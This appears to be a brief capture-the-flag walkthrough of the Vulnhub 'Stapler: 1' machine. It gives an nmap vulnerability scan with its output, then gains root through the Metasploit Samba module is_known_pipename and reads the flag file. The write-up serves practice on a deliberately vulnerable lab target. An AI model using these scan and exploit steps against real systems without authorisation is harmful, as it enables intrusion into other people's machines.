Stapler: 1 Vulnhub Machine Walkthrough

Lets find out the IP first with nmap


The IP is

Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.

root@kali:~# nmap -sV -O -A -T5 --script vuln
Starting Nmap 7.80 ( ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for
Host is up (0.00064s latency).
Not shown: 992 filtered ports
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0
|_      CVE-2019-14834  4.3
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   Slowloris DOS attack
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                    
|       the target web server and sending a partial request. By doing so, it starves 
|       the http server's resources causing Denial Of Service.
|     Disclosure date: 2009-09-17
|     References:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.64 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds

Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.

samba is running on port 139. Lets try to exploit it before going to ftp.

msf5 > msf5 > use exploit/linux/samba/is_known_pipename

Now set the options

Time to run the exploit. Enter run

We got the root. Now lets read the flag.

cat /root/flag.txt

Finished! Thats all for today.